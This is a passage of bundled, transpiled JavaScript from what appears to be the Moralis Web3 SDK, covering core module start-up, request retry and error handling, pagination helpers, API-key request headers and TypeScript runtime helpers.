         * Start all modules, this function should be called before any interaction with a module,
         * as it is responsible for initialising the modules.
         *
         * This will call `start()` on every registered module
         */ this.start = function(providedConfig) {
            return $10891f2cb3e98601$var$__awaiter(_this, void 0, void 0, function() {
                var allModules;
                return $10891f2cb3e98601$var$__generator(this, function(_a) {
                    switch(_a.label){
                        case 0:
                            if (this._isStarted) throw new $10891f2cb3e98601$export$a0860861f22cc326({
                                message: "Modules are started already. This method should be called only one time.",
                                code: $10891f2cb3e98601$export$643b9db13fb4e195.ALREADY_INITIALIZED
                            });
                            this._isStarted = true;
                            allModules = this.modules.list();
                            if (providedConfig) this.config.merge(providedConfig);
                            this.logger.verbose("Starting all registered modules", {
                                moduleNames: this.modules.listNames()
                            });
                            return [
                                4 /*yield*/ ,
                                Promise.all(allModules.map(function(module) {
                                    return module.start();
                                }))
                            ];
                        case 1:
                            _a.sent();
                            this.logger.verbose("Finished starting all registered modules", {
                                moduleNames: this.modules.listNames()
                            });
                            return [
                                2 /*return*/ 
                            ];
                    }
                });
            });
        };
    }
    Core.create = function() {
        var modules = new $10891f2cb3e98601$export$6d8228690abc2da8();
        var config = new $10891f2cb3e98601$export$29cd7b75162a9425();
        var logger = new $10891f2cb3e98601$export$e26347b971d391c9(Core.moduleName, config);
        var core = new Core(modules, config, logger);
        $10891f2cb3e98601$var$CoreConfigSetup.register(config);
        return core;
    };
    Object.defineProperty(Core.prototype, "isStarted", {
        get: function() {
            return this._isStarted;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Core.prototype, "BigNumber", {
        get: function() {
            return $10891f2cb3e98601$export$d97aa349ed20696;
        },
        enumerable: false,
        configurable: true
    });
    Core.moduleName = "core";
    Core.libVersion = $10891f2cb3e98601$var$LIB_VERSION;
    return Core;
}();
var $10891f2cb3e98601$export$211989d19e9f0ff7 = /** @class */ function() {
    function CoreProvider() {}
    CoreProvider.getDefault = function() {
        if (!this.core) throw new $10891f2cb3e98601$export$11e3a3d7d0a8e488({
            code: $10891f2cb3e98601$export$643b9db13fb4e195.NOT_INITIALIZED,
            message: "Default instance of Core is not set"
        });
        return this.core;
    };
    CoreProvider.setDefault = function(core) {
        if (this.core) throw new $10891f2cb3e98601$export$11e3a3d7d0a8e488({
            code: $10891f2cb3e98601$export$643b9db13fb4e195.ALREADY_INITIALIZED,
            message: "Default instance of Core is already set"
        });
        this.core = core;
    };
    return CoreProvider;
}();
/**
 * The base class of every Moralis class that gets registered as a module via MoralisModules
 * It should always be created with:
 * - `name`: name of the module (should be unique)
 * - `core`: the Core instance
 * - `type`: (optional) CoreModuleType, defaults to CoreModuleType.DEFAULT
 *
 * When creating an api, or network module, you should use the ApiModule or NetworkModule
 */ // eslint-disable-next-line @typescript-eslint/no-explicit-any
var $10891f2cb3e98601$export$c3a9d7ff17e4f3ed = /** @class */ function() {
    function Module(name, core, type) {
        if (type === void 0) type = $10891f2cb3e98601$export$6a8195ee8dd1cc03.DEFAULT;
        this.name = name;
        this.core = core;
        this.type = type;
        this.logger = $10891f2cb3e98601$export$e26347b971d391c9.create(this.name, this.core);
    }
    /**
     * Any cleanup that needs to be done for removing this module.
     * It also should remove the module via `this.core.modules.remove(this.name)`
     */ Module.prototype.cleanUp = function() {
        this.core.modules.remove(this.name);
    };
    return Module;
}();
/**
 * The base class of every Moralis Api class that gets registered as a module via MoralisModules
 * It should always be created with:
 * - `name`: name of the module (should be unique)
 * - `core`: the Core instance
 * - `baseUrlProvider`: the provider of the base URL.
 */ // eslint-disable-next-line @typescript-eslint/no-explicit-any
var $10891f2cb3e98601$export$6d7e12e62bd6aef5 = /** @class */ function(_super) {
    $10891f2cb3e98601$var$__extends(ApiModule, _super);
    function ApiModule(name, core, baseUrlProvider) {
        var _this = _super.call(this, name, core, $10891f2cb3e98601$export$6a8195ee8dd1cc03.API) || this;
        _this.baseUrlProvider = baseUrlProvider;
        return _this;
    }
    Object.defineProperty(ApiModule.prototype, "baseUrl", {
        /**
         * @description The base URL of the API.
         */ get: function() {
            if (!this._baseUrl) this._baseUrl = this.baseUrlProvider();
            return this._baseUrl;
        },
        enumerable: false,
        configurable: true
    });
    return ApiModule;
}($10891f2cb3e98601$export$c3a9d7ff17e4f3ed);
/**
 * Note this is just an interface, used in the core config.
 * The implementations are located in the @moralisweb3/common-sol-utils package.
 */ var $10891f2cb3e98601$export$36f06d363e47b12 = [
    "mainnet",
    "devnet"
];
var $10891f2cb3e98601$export$676c8946b241bf4b = new $10891f2cb3e98601$export$11e3a3d7d0a8e488({
    code: $10891f2cb3e98601$export$643b9db13fb4e195.GENERIC_CORE_ERROR,
    message: "Incorrect type provided, code should not reach here"
});
/**
 * Typesafe check, to make sure that code never reaches a certain point.
 * Can be used as an exhaustive check in swtich/if-else statements
 *
 * When used properly with Typescript, this code should never reach, as it is typed as 'never'
 *
 * If the code does reach this assertion an UnreachableError is thrown
 */ // eslint-disable-next-line @typescript-eslint/no-unused-vars
var $10891f2cb3e98601$export$f2525c1d596f8d46 = function(x) {
    throw $10891f2cb3e98601$export$676c8946b241bf4b;
};
var $10891f2cb3e98601$export$378f2f483a0480e7 = /** @class */ function() {
    function AxiosRetry() {}
    // TODO: refactor to reduce complexity
    // eslint-disable-next-line complexity
    AxiosRetry.request = function(retryConfig, requestConfig) {
        var _a;
        return $10891f2cb3e98601$var$__awaiter(this, void 0, void 0, function() {
            var attempt, response, e_1, axiosError;
            return $10891f2cb3e98601$var$__generator(this, function(_b) {
                switch(_b.label){
                    case 0:
                        attempt = 1;
                        _b.label = 1;
                    case 1:
                        _b.trys.push([
                            1,
                            3,
                            ,
                            4
                        ]);
                        return [
                            4 /*yield*/ ,
                            (0, $57966c7e0affc4cb$export$2e2bcd8739ae039).request(requestConfig)
                        ];
                    case 2:
                        response = _b.sent();
                        return [
                            2 /*return*/ ,
                            response
                        ];
                    case 3:
                        e_1 = _b.sent();
                        if (attempt >= retryConfig.maxRetries) throw e_1;
                        if (!requestConfig.method || !retryConfig.allowedMethods.includes(requestConfig.method.toUpperCase())) throw e_1;
                        if (!(0, $57966c7e0affc4cb$export$2e2bcd8739ae039).isAxiosError(e_1)) throw e_1;
                        axiosError = e_1;
                        if (!((_a = axiosError.response) === null || _a === void 0 ? void 0 : _a.status) || !retryConfig.allowedResponseStatuses.includes(axiosError.response.status)) throw e_1;
                        if (retryConfig.beforeRetry) retryConfig.beforeRetry(attempt, axiosError);
                        return [
                            3 /*break*/ ,
                            4
                        ];
                    case 4:
                        attempt++;
                        return [
                            3 /*break*/ ,
                            1
                        ];
                    case 5:
                        return [
                            2 /*return*/ 
                        ];
                }
            });
        });
    };
    return AxiosRetry;
}();
/**
 * Verify if the error is an AxiosError that is caused by a HTTP API error.
 */ var $10891f2cb3e98601$var$isApiRequestError = function(error) {
    // Check if the error is an axios error
    if (!(error instanceof (0, $b302555736d21bd7$export$c1fbed17c2f6a328))) return false;
    // Check if the error is a result of a 400 or 500 response
    if (error.code !== (0, $b302555736d21bd7$export$c1fbed17c2f6a328).ERR_BAD_REQUEST && error.code !== (0, $b302555736d21bd7$export$c1fbed17c2f6a328).ERR_BAD_RESPONSE) return false;
    return true;
};
/**
 * Extract the message from a ApiRequestError. Note that this is implemented based on how the Moralis APIs return Errors.
 * This can be in the form:
 * - { message: 'some message' }
 * - { message: ['some message', 'some other message'] }
 * - { }
 */ var $10891f2cb3e98601$var$getMessageFromApiRequestError = function(error) {
    var _a = error.response.data, message = _a.message, details = _a.details;
    var result = "Unknown error (no error info returned from API)";
    if (Array.isArray(message)) result = message.join(", ");
    else if (typeof message === "string") result = message;
    if (details) result += " ".concat(JSON.stringify(details));
    return result;
};
/**
 * A controller responsible to handle all requests in Moralis,
 * compatible with browser, nodejJs and react-native
 */ var $10891f2cb3e98601$export$cfde8cc919b877ff = /** @class */ function() {
    function RequestController(config, logger) {
        this.config = config;
        this.logger = logger;
    }
    RequestController.create = function(core) {
        return new RequestController(core.config, core.logger);
    };
    RequestController.prototype.request = function(config) {
        return $10891f2cb3e98601$var$__awaiter(this, void 0, void 0, function() {
            var maxRetries, retryConfig, response, e_1, error;
            var _this = this;
            return $10891f2cb3e98601$var$__generator(this, function(_a) {
                switch(_a.label){
                    case 0:
                        this.logger.verbose("[RequestController] request started", {
                            url: config.url,
                            method: config.method,
                            body: config.data
                        });
                        maxRetries = this.config.get($10891f2cb3e98601$export$ebdca930f2e6a4b2.maxRetries);
                        retryConfig = {
                            maxRetries: maxRetries,
                            allowedMethods: [
                                "GET",
                                "OPTIONS"
                            ],
                            allowedResponseStatuses: [
                                408,
                                413,
                                429,
                                500,
                                502,
                                503,
                                504
                            ],
                            beforeRetry: function(attempt, error) {
                                _this.logger.verbose("[RequestController] request retry", {
                                    url: config.url,
                                    method: config.method,
                                    body: config.data,
                                    error: error,
                                    attempt: attempt
                                });
                            }
                        };
                        _a.label = 1;
                    case 1:
                        _a.trys.push([
                            1,
                            3,
                            ,
                            4
                        ]);
                        return [
                            4 /*yield*/ ,
                            $10891f2cb3e98601$export$378f2f483a0480e7.request(retryConfig, $10891f2cb3e98601$var$__assign($10891f2cb3e98601$var$__assign({}, config), {
                                timeout: 20000,
                                maxContentLength: Infinity,
                                maxBodyLength: Infinity
                            }))
                        ];
                    case 2:
                        response = _a.sent();
                        return [
                            2 /*return*/ ,
                            response.data
                        ];
                    case 3:
                        e_1 = _a.sent();
                        error = this.makeError(e_1);
                        this.logger.verbose("[RequestController] request error", {
                            url: config.url,
                            method: config.method,
                            body: config.data,
                            cause: error.cause,
                            name: error.name,
                            details: error.details
                        });
                        throw error;
                    case 4:
                        return [
                            2 /*return*/ 
                        ];
                }
            });
        });
    };
    RequestController.prototype.makeError = function(error) {
        if ($10891f2cb3e98601$var$isApiRequestError(error)) {
            var _a = error.response, status_1 = _a.status, statusText = _a.statusText;
            var apiMessage = $10891f2cb3e98601$var$getMessageFromApiRequestError(error);
            return new $10891f2cb3e98601$export$11e3a3d7d0a8e488({
                code: $10891f2cb3e98601$export$643b9db13fb4e195.REQUEST_ERROR,
                message: "Request failed, ".concat(statusText, "(").concat(status_1, "): ").concat(apiMessage),
                cause: error,
                details: {
                    status: status_1,
                    response: error.response
                }
            });
        }
        var err = error instanceof Error ? error : new Error("".concat(error));
        return new $10891f2cb3e98601$export$11e3a3d7d0a8e488({
            code: $10891f2cb3e98601$export$643b9db13fb4e195.REQUEST_ERROR,
            message: "Request failed: ".concat(err.message),
            cause: err
        });
    };
    RequestController.prototype.post = function(url, searchParams, body, options, abortSignal) {
        return this.request({
            url: url,
            params: searchParams,
            method: "POST",
            data: body,
            headers: options === null || options === void 0 ? void 0 : options.headers,
            signal: abortSignal
        });
    };
    RequestController.prototype.put = function(url, searchParams, body, options, abortSignal) {
        return this.request({
            url: url,
            params: searchParams,
            method: "PUT",
            data: body,
            headers: options === null || options === void 0 ? void 0 : options.headers,
            signal: abortSignal
        });
    };
    RequestController.prototype.get = function(url, searchParams, options, abortSignal) {
        return $10891f2cb3e98601$var$__awaiter(this, void 0, void 0, function() {
            return $10891f2cb3e98601$var$__generator(this, function(_a) {
                return [
                    2 /*return*/ ,
                    this.request({
                        url: url,
                        params: searchParams,
                        method: "GET",
                        headers: options === null || options === void 0 ? void 0 : options.headers,
                        signal: abortSignal
                    })
                ];
            });
        });
    };
    RequestController.prototype.delete = function(url, searchParams, body, options, abortSignal) {
        return $10891f2cb3e98601$var$__awaiter(this, void 0, void 0, function() {
            return $10891f2cb3e98601$var$__generator(this, function(_a) {
                return [
                    2 /*return*/ ,
                    this.request({
                        url: url,
                        params: searchParams,
                        method: "DELETE",
                        data: body,
                        headers: options === null || options === void 0 ? void 0 : options.headers,
                        signal: abortSignal
                    })
                ];
            });
        });
    };
    return RequestController;
}();
var $10891f2cb3e98601$export$6191db1c44f01b8d = /** @class */ function() {
    function OperationRequestValidator(operation) {
        this.allParamNames = $10891f2cb3e98601$var$__spreadArray($10891f2cb3e98601$var$__spreadArray($10891f2cb3e98601$var$__spreadArray([], operation.urlPathParamNames || [], true), operation.urlSearchParamNames || [], true), operation.bodyParamNames || [], true);
    }
    OperationRequestValidator.prototype.validate = function(request) {
        var requestParamNames = Object.keys(request);
        for(var _i = 0, requestParamNames_1 = requestParamNames; _i < requestParamNames_1.length; _i++){
            var paramName = requestParamNames_1[_i];
            if (!this.allParamNames.includes(paramName)) {
                var allParamsNames = this.allParamNames.join(", ");
                throw new $10891f2cb3e98601$export$a0860861f22cc326({
                    code: $10891f2cb3e98601$export$643b9db13fb4e195.INVALID_ARGUMENT,
                    message: "Request contains unknown parameter: ".concat(paramName, ". This operation supports the following parameters: ").concat(allParamsNames)
                });
            }
        }
    };
    return OperationRequestValidator;
}();
var $10891f2cb3e98601$export$485547b05523629;
(function(OperationType) {
    OperationType["NON_NULLABLE"] = "nonNullable";
    OperationType["NULLABLE"] = "nullable";
    OperationType["PAGINATED"] = "paginated";
})($10891f2cb3e98601$export$485547b05523629 || ($10891f2cb3e98601$export$485547b05523629 = {}));
function $10891f2cb3e98601$export$5781675dfc71ff9e(operation) {
    if (operation.firstPageIndex === 0 || operation.firstPageIndex === 1) return $10891f2cb3e98601$export$485547b05523629.PAGINATED;
    if (operation.isNullable) return $10891f2cb3e98601$export$485547b05523629.NULLABLE;
    return $10891f2cb3e98601$export$485547b05523629.NON_NULLABLE;
}
var $10891f2cb3e98601$export$c592a7e9df7d80ee = /** @class */ function() {
    function NextPaginatedRequestResolver() {}
    NextPaginatedRequestResolver.resolve = function(firstPageIndex, request, pagination) {
        if (pagination.cursor) return $10891f2cb3e98601$var$__assign($10891f2cb3e98601$var$__assign({}, request), {
            cursor: pagination.cursor
        });
        if (typeof pagination.total === "number") {
            var currentPage = firstPageIndex === 1 ? pagination.page : pagination.page + 1;
            var hasNextPage = pagination.total > pagination.pageSize * currentPage;
            if (hasNextPage) {
                var offset = (pagination.page + 1) * (request.limit || 500);
                return $10891f2cb3e98601$var$__assign($10891f2cb3e98601$var$__assign({}, request), {
                    offset: offset
                });
            }
        }
        return null;
    };
    return NextPaginatedRequestResolver;
}();
var $10891f2cb3e98601$export$71369ea70577543f = /** @class */ function() {
    function PaginationReader() {}
    PaginationReader.read = function(jsonResponse) {
        var _a, _b;
        return {
            page: (_a = jsonResponse.page) !== null && _a !== void 0 ? _a : 0,
            pageSize: (_b = jsonResponse.page_size) !== null && _b !== void 0 ? _b : 0,
            total: jsonResponse.total,
            cursor: jsonResponse.cursor
        };
    };
    return PaginationReader;
}();
var $10891f2cb3e98601$export$355ff44b656e1f6d = /** @class */ function() {
    function ResponseAdapter(jsonResponse, getResponse) {
        this.jsonResponse = jsonResponse;
        this.getResponse = getResponse;
    }
    Object.defineProperty(ResponseAdapter.prototype, "result", {
        get: function() {
            return this.getResponse();
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(ResponseAdapter.prototype, "raw", {
        get: function() {
            return this.jsonResponse;
        },
        enumerable: false,
        configurable: true
    });
    ResponseAdapter.prototype.toJSON = function() {
        return this.jsonResponse;
    };
    return ResponseAdapter;
}();
var $10891f2cb3e98601$export$8594df037fe69b54 = /** @class */ function() {
    function PaginatedResponseAdapter(pagination, jsonResponse, getResult, nextHandler) {
        var _this = this;
        this.pagination = pagination;
        this.jsonResponse = jsonResponse;
        this.getResult = getResult;
        this.nextHandler = nextHandler;
        this.hasNext = function() {
            return !!_this.nextHandler;
        };
        this.next = function() {
            if (!_this.nextHandler) throw new $10891f2cb3e98601$export$a0860861f22cc326({
                code: $10891f2cb3e98601$export$643b9db13fb4e195.NO_DATA_FOUND,
                message: "Page limit exceeded! Before call this method check an existence of the next page by .hasNext() method."
            });
            return _this.nextHandler();
        };
    }
    Object.defineProperty(PaginatedResponseAdapter.prototype, "result", {
        get: function() {
            return this.getResult();
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(PaginatedResponseAdapter.prototype, "raw", {
        get: function() {
            return this.jsonResponse;
        },
        enumerable: false,
        configurable: true
    });
    PaginatedResponseAdapter.prototype.toJSON = function() {
        return this.jsonResponse;
    };
    return PaginatedResponseAdapter;
}();
var $10891f2cb3e98601$export$bc7802f0bef8d7aa = function(value) {
    return value.replace(/([-_][a-z])/gi, function($1) {
        return $1.toUpperCase().replace("-", "").replace("_", "");
    });
};
var $10891f2cb3e98601$var$isObject = function(o) {
    return o === Object(o) && !Array.isArray(o) && typeof o !== "function";
};
var $10891f2cb3e98601$export$86f54f62aa7a7514 = function(data) {
    if ($10891f2cb3e98601$var$isObject(data)) {
        var n_1 = {};
        Object.keys(data).forEach(function(k) {
            // @ts-ignore TODO: fix typing
            n_1[$10891f2cb3e98601$export$bc7802f0bef8d7aa(k)] = $10891f2cb3e98601$export$86f54f62aa7a7514(data[k]);
        });
        return n_1;
    }
    if (Array.isArray(data)) // @ts-ignore TODO: difficult to type with recursive arrays
    return data.map(function(i) {
        return $10891f2cb3e98601$export$86f54f62aa7a7514(i);
    });
    return data;
};
function $10891f2cb3e98601$export$f8b8b9ce72e9ccbf(value, transform) {
    if (value == null) return undefined;
    if (transform) return transform(value);
    return value;
}


var $bd1f3f52e29d943b$export$91cdabc826465a24 = {
    apiKey: {
        name: "apiKey",
        defaultValue: null
    }
};
// TODO: we need to delete this file when this function will be not used.
// eslint-disable-next-line @typescript-eslint/no-explicit-any
function $bd1f3f52e29d943b$export$88ce5bacf74524e8(operation) {
    return {
        name: operation.name,
        method: operation.method.toLowerCase(),
        bodyParamNames: operation.bodyParamNames || [],
        urlPattern: operation.urlPathPattern,
        urlPatternParamNames: operation.urlPathParamNames
    };
}
var $bd1f3f52e29d943b$var$_a;
var $bd1f3f52e29d943b$var$Environment;
(function(Environment) {
    Environment["BROWSER"] = "browser";
    Environment["NODE"] = "node";
})($bd1f3f52e29d943b$var$Environment || ($bd1f3f52e29d943b$var$Environment = {}));
var $bd1f3f52e29d943b$var$sdkNameForEnvironment = ($bd1f3f52e29d943b$var$_a = {}, $bd1f3f52e29d943b$var$_a[$bd1f3f52e29d943b$var$Environment.BROWSER] = "Javascript SDK", $bd1f3f52e29d943b$var$_a[$bd1f3f52e29d943b$var$Environment.NODE] = "NodeJS SDK", $bd1f3f52e29d943b$var$_a);
var $bd1f3f52e29d943b$var$currentEnvironment = $bd1f3f52e29d943b$var$getEnvironment();
function $bd1f3f52e29d943b$var$detectIsBrowser() {
    try {
        // @ts-ignore
        // eslint-disable-next-line no-undef
        return typeof window !== "undefined" && typeof window.document !== "undefined";
    } catch (error) {
        return false;
    }
}
function $bd1f3f52e29d943b$var$getEnvironment() {
    if ($bd1f3f52e29d943b$var$detectIsBrowser()) return $bd1f3f52e29d943b$var$Environment.BROWSER;
    // Otherwise we use NodeJs as default
    // (in theory this will also account for other environments like webworker etc. but we don't support this at the moment)
    return $bd1f3f52e29d943b$var$Environment.NODE;
}
/**
 * Gets the platform name, this is the name of the SDK,
 * Note: previously this was always named 'JS SDK', now we separate by environment / package-origin
 */ function $bd1f3f52e29d943b$var$getSdkName(environment, product) {
    // If the product is set in the config, we use this as a name, this is done in the SDKs like React/Next etc.
    if (product) return product;
    // Otherwise we use the name based on the environment
    return $bd1f3f52e29d943b$var$sdkNameForEnvironment[environment];
}
/**
 * Additional data for the api to specify SDK details of the request
 */ var $bd1f3f52e29d943b$export$5e0985b510477f07 = function(product) {
    var sdkName = $bd1f3f52e29d943b$var$getSdkName($bd1f3f52e29d943b$var$currentEnvironment, product);
    return {
        "x-moralis-platform": sdkName,
        "x-moralis-platform-version": (0, $10891f2cb3e98601$export$4143ab5b91744744).libVersion,
        "x-moralis-build-target": $bd1f3f52e29d943b$var$currentEnvironment
    };
};
/******************************************************************************
Copyright (c) Microsoft Corporation.

Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted.

THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
PERFORMANCE OF THIS SOFTWARE.
***************************************************************************** */ /* global Reflect, Promise */ var $bd1f3f52e29d943b$var$extendStatics = function(d, b) {
    $bd1f3f52e29d943b$var$extendStatics = Object.setPrototypeOf || ({
        __proto__: []
    }) instanceof Array && function(d, b) {
        d.__proto__ = b;
    } || function(d, b) {
        for(var p in b)if (Object.prototype.hasOwnProperty.call(b, p)) d[p] = b[p];
    };
    return $bd1f3f52e29d943b$var$extendStatics(d, b);
};
function $bd1f3f52e29d943b$var$__extends(d, b) {
    if (typeof b !== "function" && b !== null) throw new TypeError("Class extends value " + String(b) + " is not a constructor or null");
    $bd1f3f52e29d943b$var$extendStatics(d, b);
    function __() {
        this.constructor = d;
    }
    d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __());
}
var $bd1f3f52e29d943b$var$__assign = function() {
    $bd1f3f52e29d943b$var$__assign = Object.assign || function __assign(t) {
        for(var s, i = 1, n = arguments.length; i < n; i++){
            s = arguments[i];
            for(var p in s)if (Object.prototype.hasOwnProperty.call(s, p)) t[p] = s[p];
        }
        return t;
    };
    return $bd1f3f52e29d943b$var$__assign.apply(this, arguments);
};
function $bd1f3f52e29d943b$var$__awaiter(thisArg, _arguments, P, generator) {
    function adopt(value) {
        return value instanceof P ? value : new P(function(resolve) {
            resolve(value);
        });
    }
    return new (P || (P = Promise))(function(resolve, reject) {
        function fulfilled(value) {
            try {
                step(generator.next(value));
            } catch (e) {
                reject(e);
            }
        }
        function rejected(value) {
            try {
                step(generator["throw"](value));
            } catch (e) {
                reject(e);
            }
        }
        function step(result) {
            result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected);
        }
        step((generator = generator.apply(thisArg, _arguments || [])).next());
    });
}
function $bd1f3f52e29d943b$var$__generator(thisArg, body) {
    var _ = {
        label: 0,
        sent: function() {
            if (t[0] & 1) throw t[1];
            return t[1];
        },
        trys: [],
        ops: []
    }, f, y, t, g;
    return g = {
        next: verb(0),
        "throw": verb(1),
        "return": verb(2)
    }, typeof Symbol === "function" && (g[Symbol.iterator] = function() {
        return this;
    }), g;
    function verb(n) {
        return function(v) {
            return step([
                n,
                v
            ]);
        };
    }
    function step(op) {
        if (f) throw new TypeError("Generator is already executing.");
        while(g && (g = 0, op[0] && (_ = 0)), _)try {
            if (f = 1, y && (t = op[0] & 2 ? y["return"] : op[0] ? y["throw"] || ((t = y["return"]) && t.call(y), 0) : y.next) && !(t = t.call(y, op[1])).done) return t;
            if (y = 0, t) op = [
                op[0] & 2,
                t.value
            ];
            switch(op[0]){
                case 0:
                case 1:
                    t = op;
                    break;
                case 4:
                    _.label++;
                    return {
                        value: op[1],
                        done: false
                    };
                case 5:
                    _.label++;
                    y = op[1];
                    op = [
                        0
                    ];
                    continue;
                case 7:
                    op = _.ops.pop();
                    _.trys.pop();
                    continue;
                default:
                    if (!(t = _.trys, t = t.length > 0 && t[t.length - 1]) && (op[0] === 6 || op[0] === 2)) {
                        _ = 0;
                        continue;
                    }
                    if (op[0] === 3 && (!t || op[1] > t[0] && op[1] < t[3])) {
                        _.label = op[1];
                        break;
                    }
                    if (op[0] === 6 && _.label < t[1]) {
                        _.label = t[1];
                        t = op;
                        break;
                    }
                    if (t && _.label < t[2]) {
                        _.label = t[2];
                        _.ops.push(op);
                        break;
                    }
                    if (t[2]) _.ops.pop();
                    _.trys.pop();
                    continue;
            }
            op = body.call(thisArg, _);
        } catch (e) {
            op = [
                6,
                e
            ];
            y = 0;
        } finally{
            f = t = 0;
        }
        if (op[0] & 5) throw op[1];
        return {
            value: op[0] ? op[1] : void 0,
            done: true
        };
    }
}
var $bd1f3f52e29d943b$var$OperationRequestBuilder = /** @class */ function() {
    function OperationRequestBuilder(operation, core) {
        this.operation = operation;
        this.core = core;
    }
    OperationRequestBuilder.prototype.prepareUrl = function(baseUrl, request) {
        var _this = this;
        var _a;
        var urlParams = this.operation.getRequestUrlParams(request, this.core);
        var urlPath = this.operation.urlPathPattern;
        for(var _i = 0, _b = (_a = this.operation.urlPathParamNames) !== null && _a !== void 0 ? _a : []; _i < _b.length; _i++){
            var paramName = _b[_i];
            var paramValue = urlParams[paramName];
            if (paramValue === undefined || paramValue === null) throw new Error("Param ".concat(paramName, " is required"));
            urlPath = urlPath.replace("{".concat(paramName, "}"), paramValue);
        }
        var url = "".concat(baseUrl).concat(urlPath);
        var urlSearchParams = {};
        Object.keys(urlParams).filter(function(paramName) {
            var _a;
            return !((_a = _this.operation.urlPathParamNames) === null || _a === void 0 ? void 0 : _a.includes(paramName));
        }).forEach(function(paramName) {
            var paramValue = urlParams[paramName];
            if (paramValue !== undefined && paramValue !== null) urlSearchParams[paramName] = paramValue;
        });
        return {
            url: url,
            urlSearchParams: urlSearchParams
        };
    };
    OperationRequestBuilder.prototype.prepareBody = function(request) {
        if (!this.operation.bodyType && !this.operation.getRequestBody) return undefined;
        if (!this.operation.getRequestBody) throw new Error("getRequestBody is not implemented for operation ".concat(this.operation.name));
        if (!this.operation.bodyParamNames) throw new Error("bodyParamNames are empty for operation ".concat(this.operation.name));
        var body = this.operation.getRequestBody(request, this.core);
        if (this.operation.bodyType === "properties") return body;
        if (this.operation.bodyType === "raw") return body;
        throw new Error("Not supported body type: ".concat(this.operation.bodyType));
    };
    OperationRequestBuilder.prototype.prepareHeaders = function() {
        var apiKey = this.core.config.get($bd1f3f52e29d943b$export$91cdabc826465a24.apiKey);
        var product = this.core.config.get((0, $10891f2cb3e98601$export$ebdca930f2e6a4b2).product);
        if (!apiKey) throw new (0, $10891f2cb3e98601$export$1e54abe040eff0f)({
            code: (0, $10891f2cb3e98601$export$dbc62e876b4a53ce).API_KEY_NOT_SET,
            message: "apiKey is not set"
        });
        var headers = $bd1f3f52e29d943b$export$5e0985b510477f07(product);
        headers["x-api-key"] = apiKey;
        return headers;
    };
    return OperationRequestBuilder;
}();
var $bd1f3f52e29d943b$export$7f2fa56918213716 = /** @class */ function() {
    function OperationResolver(operation, baseUrl, core) {
        var _this = this;
        this.operation = operation;
        this.baseUrl = baseUrl;
        this.core = core;
        this.requestValidator = new (0, $10891f2cb3e98601$export$6191db1c44f01b8d)(this.operation);
        this.requestBuilder = new $bd1f3f52e29d943b$var$OperationRequestBuilder(this.operation, this.core);
        this.requestController = (0, $10891f2cb3e98601$export$cfde8cc919b877ff).create(this.core);
        this.fetch = function(request) {
            return $bd1f3f52e29d943b$var$__awaiter(_this, void 0, void 0, function() {
                var _a, url, urlSearchParams, body, jsonResponse;
                var _this = this;
                return $bd1f3f52e29d943b$var$__generator(this, function(_b) {
                    switch(_b.label){
                        case 0:
                            this.requestValidator.validate(request);
                            _a = this.requestBuilder.prepareUrl(this.baseUrl, request), url = _a.url, urlSearchParams = _a.urlSearchParams;
                            body = this.requestBuilder.prepareBody(request);
                            return [
                                4 /*yield*/ ,
                                this.requestController.request({
                                    method: this.operation.method,
                                    url: url,
                                    params: urlSearchParams,
                                    headers: this.requestBuilder.prepareHeaders(),
                                    data: body
                                })
                            ];
                        case 1:
                            jsonResponse = _b.sent();
                            return [
                                2 /*return*/ ,
                                new (0, $10891f2cb3e98601$export$355ff44b656e1f6d)(jsonResponse, function() {
                                    return _this.operation.deserializeResponse(jsonResponse, request, _this.core);
                                })
                            ];
                    }
                });
            });
        };
        if (operation.isNullable) throw new Error("Operation ".concat(operation.name, " has invalid value for isNullable property"));
    }
    return OperationResolver;
}();
function $bd1f3f52e29d943b$var$isNotFoundError(e) {
    var _a;
    if ((0, $10891f2cb3e98601$export$e8ac0035cab6a95c)(e)) {
        if (((_a = e.details) === null || _a === void 0 ? void 0 : _a.status) === 404) return true;
        if (e.code === (0, $10891f2cb3e98601$export$dbc62e876b4a53ce).NOT_FOUND) return true;
    }
    return false;
}
var $bd1f3f52e29d943b$export$39804cd0bd80fc38 = /** @class */ function() {
    function NullableOperationResolver(operation, baseUrl, core) {
        var _this = this;
        this.operation = operation;
        this.baseUrl = baseUrl;
        this.core = core;
        this.requestValidator = new (0, $10891f2cb3e98601$export$6191db1c44f01b8d)(this.operation);
        this.requestBuilder = new $bd1f3f52e29d943b$var$OperationRequestBuilder(this.operation, this.core);
        this.requestController = (0, $10891f2cb3e98601$export$cfde8cc919b877ff).create(this.core);
        this.fetch = function(request) {
            return $bd1f3f52e29d943b$var$__awaiter(_this, void 0, void 0, function() {
                var result, e_1;
                return $bd1f3f52e29d943b$var$__generator(this, function(_a) {
                    switch(_a.label){
                        case 0:
                            this.requestValidator.validate(request);
                            _a.label = 1;
                        case 1:
                            _a.trys.push([
                                1,
                                3,
                                ,
                                4
                            ]);
                            return [
                                4 /*yield*/ ,
                                this._fetch(request)
                            ];
                        case 2:
                            result = _a.sent();
                            // TODO: this block should be deleted after the back-end adjustments.
                            if (!result.raw || typeof result.raw === "object" && Object.keys(result.raw).length === 0) throw new (0, $10891f2cb3e98601$export$1e54abe040eff0f)({
                                code: (0, $10891f2cb3e98601$export$dbc62e876b4a53ce).NOT_FOUND,
                                message: "The resource is not found"
                            });
                            return [
                                2 /*return*/ ,
                                result
                            ];
                        case 3:
                            e_1 = _a.sent();
                            if ($bd1f3f52e29d943b$var$isNotFoundError(e_1)) return [
                                2 /*return*/ ,
                                null
                            ];
                            throw e_1;
                        case 4:
                            return [
                                2 /*return*/ 
                            ];
                    }
                });
            });
        };
